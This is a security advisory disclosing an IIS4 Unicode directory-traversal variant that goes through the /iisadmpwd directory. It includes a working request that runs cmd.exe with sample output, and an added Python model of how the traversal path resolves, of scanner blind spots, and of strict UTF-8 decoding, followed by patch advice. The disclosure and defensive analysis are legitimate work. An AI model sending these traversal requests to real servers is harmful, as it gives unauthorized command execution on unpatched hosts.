===[ www.sinsecurity.net ]===

====[ Information ]======
Program Name   : Microsoft Internet Information Server (IIS)
Program Author : http://www.microsoft.com/iis
Test Versions  : 4 (other versions are not vulnerable to this variant)
Advisory Author: Niels Teusink, a.k.a. Nu Omega Tau
Contact        : [EMAIL PROTECTED]
=========================

This advisory was made in Holland.

Overview
========
The extended Unicode directory-traversal vulnerability was found in October 2000
by an unknown person; rfp (RainForestPuppy) did further research on it. Later
on, variants were found, such as using the /msadc directory instead of /scripts,
and using different ways of Unicode-encoding the traversal.

All these techniques have their pros and cons. The /scripts method works on both
IIS4 and IIS5, but fails when the wwwroot directory is on a different partition
than the winnt directory, because the traversal cannot cross drives. The /msadc
method solves this, as the /msadc directory is under \Program Files, which is
usually on the same partition as the winnt directory; the /msadc method does not
work with IIS5, though.

Both methods still share a common flaw: the name of the Windows NT directory
(usually winnt) must be known for the exploit to work. With the method described
here, this is not the case. This method only works with IIS4, though.

For more information on the vulnerability, search the Bugtraq archives on
www.securityfocus.com for the keyword "Unicode".
RainForestPuppy's research can be found at www.wiretrip.net.

Problem Description
===================
The /iisadmpwd virtual directory maps to a subdirectory of the Windows NT
directory (System32\inetsrv\iisadmpwd), so when traversing from it, it is not
necessary to specify the Windows NT directory at all: two levels up from
/iisadmpwd is System32, where cmd.exe lives. We can simply request

http://target.machine/iisadmpwd/..%c0%af../cmd.exe?/c+dir

As you can see, I don't specify any Windows directory, but get back:

 Directory of C:\WINDOWS\System32\inetsrv\iisadmpwd

01/01/00  11:11a        <DIR>          .
01/01/00  11:11a        <DIR>          ..
01/01/00  11:11p                 1,902 achg.htr
(...)

I can imagine admins scanning their network with home-made scripts for
vulnerabilities and only fixing the machines where the vulnerabilities are
found. When the installation directory is not winnt, such a scan would not
detect the vulnerability, yet the machine can still be exploited if it is not
patched.
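The path resolution described in the Problem Description, and the scanner blind
spot described above, as an added example in Python (this is not code from the
advisory). The virtual-directory layout, the two constructed hosts, the number of
".." steps used for /msadc, and the sample response body are assumptions chosen
to match the behaviour the advisory describes, not taken from IIS itself. The
strict flag shows what a decoder that rejects overlong UTF-8 does with the very
same requests:

```python
# Added example: a model of the IIS Unicode traversal variants discussed in
# this advisory.  Layout, hosts and sample response are constructed assumptions.
import re
from typing import Dict, Optional


def virtual_dirs(system_root: str, inetpub_root: str) -> Dict[str, str]:
    """Assumed mapping of virtual directory -> physical directory on one host.
    /iisadmpwd lives under the Windows directory, /msadc under Program Files,
    /scripts under the Inetpub root (which may sit on another partition)."""
    return {
        "/scripts": inetpub_root + r"\scripts",
        "/msadc": r"C:\Program Files\Common Files\System\msadc",
        "/iisadmpwd": system_root + r"\System32\inetsrv\iisadmpwd",
    }


_PCT = re.compile(r"%([0-9a-fA-F]{2})")


def decode_url_path(path: str, strict: bool) -> str:
    """Percent-decode the path, then decode the bytes as UTF-8.

    strict=False mimics the flaw: the overlong two-byte form %c0%af is accepted
    and yields '/'.  strict=True rejects overlong sequences, as a conforming
    decoder must, so '..%c0%af..' never turns into '../..'."""
    raw = bytearray()
    i = 0
    while i < len(path):
        m = _PCT.match(path, i)
        if m:
            raw.append(int(m.group(1), 16))
            i = m.end()
        elif ord(path[i]) < 0x80:
            raw.append(ord(path[i]))
            i += 1
        else:
            raise ValueError("only ASCII and %XX escapes are modelled")
    out = []
    j = 0
    while j < len(raw):
        b = raw[j]
        if b < 0x80:                                   # plain ASCII
            out.append(chr(b))
            j += 1
        elif 0xC0 <= b <= 0xDF and j + 1 < len(raw) and 0x80 <= raw[j + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (raw[j + 1] & 0x3F)   # two-byte sequence
            if cp < 0x80 and strict:                   # fits one byte: overlong
                raise ValueError(f"overlong UTF-8 sequence at byte {j}")
            out.append(chr(cp))
            j += 2
        else:
            raise ValueError(f"unsupported byte {b:#x} at {j}")
    return "".join(out)


def resolve(request: str, system_root: str, inetpub_root: str, strict: bool) -> Optional[str]:
    """Physical path the server would open for a request, or None if the
    request is rejected or does not start in a known virtual directory."""
    try:
        decoded = decode_url_path(request.split("?", 1)[0], strict)
    except ValueError:
        return None
    segments = [s for s in decoded.split("/") if s]
    if not segments:
        return None
    base = virtual_dirs(system_root, inetpub_root).get("/" + segments[0].lower())
    if base is None:
        return None
    drive, parts = base[:2], base[3:].split("\\")     # 'C:' and its directories
    for seg in segments[1:]:
        if seg == "..":
            if parts:            # '..' at the drive root stays there: a
                parts.pop()      # traversal never crosses to another partition
        elif seg != ".":
            parts.append(seg)
    return drive + "\\" + "\\".join(parts)


def candidates(winnt_guess: str = "winnt") -> Dict[str, str]:
    """Requests a home-made scanner might try.  The first two embed a guess at
    the Windows directory name; the /iisadmpwd request needs no such guess.
    The four '..' steps for /msadc match the assumed layout above."""
    return {
        "scripts": f"/scripts/..%c0%af../{winnt_guess}/system32/cmd.exe?/c+dir",
        "msadc": "/msadc/" + "..%c0%af../" * 4 + f"{winnt_guess}/system32/cmd.exe?/c+dir",
        "iisadmpwd": "/iisadmpwd/..%c0%af../cmd.exe?/c+dir",
    }


def scan(system_root: str, inetpub_root: str, strict: bool = False) -> Dict[str, bool]:
    """For each candidate request: does it resolve to this host's cmd.exe?"""
    cmd = (system_root + r"\System32\cmd.exe").lower()
    results = {}
    for name, req in candidates().items():
        target = resolve(req, system_root, inetpub_root, strict)
        results[name] = target is not None and target.lower() == cmd
    return results


_LISTING = re.compile(r"^\s*Directory of\s+(\S.*?)\s*$", re.MULTILINE)


def listing_directory(body: str) -> Optional[str]:
    """What a scanner keys on in the response body: the 'Directory of' line
    that cmd.exe /c dir prints.  Returns the listed directory, or None."""
    m = _LISTING.search(body)
    return m.group(1) if m else None


# Constructed response body, copied from the listing shown in this advisory.
SAMPLE_LISTING = r"""
 Directory of C:\WINDOWS\System32\inetsrv\iisadmpwd

01/01/00  11:11a        <DIR>          .
01/01/00  11:11a        <DIR>          ..
01/01/00  11:11p                 1,902 achg.htr
"""

if __name__ == "__main__":
    print(scan(r"C:\WINNT", r"C:\Inetpub"))            # all three hit
    print(scan(r"C:\WINDOWS", r"D:\Inetpub"))          # only iisadmpwd hits
    print(scan(r"C:\WINDOWS", r"D:\Inetpub", strict=True))  # nothing hits
    print(listing_directory(SAMPLE_LISTING))
```

On the second host (Windows installed as C:\WINDOWS, Inetpub on D:) the /scripts
and /msadc requests both miss, so a scanner built only from those would report
the machine clean, while the /iisadmpwd request still lands on System32\cmd.exe.
With strict decoding every request is rejected before any path is built, which
is the property a patched server must have.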

Solution
========
This is not a new problem and DOES NOT require a new patch. If you have not
applied the Unicode patch yet because the technique did not work on your
system, it may be a good idea to do so now. The patch can be found at
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23667
Although this is not a new problem, I decided to inform Microsoft of this
method before posting this.

===[ Niels Teusink - Sin Security ]===

Don't deface, email!
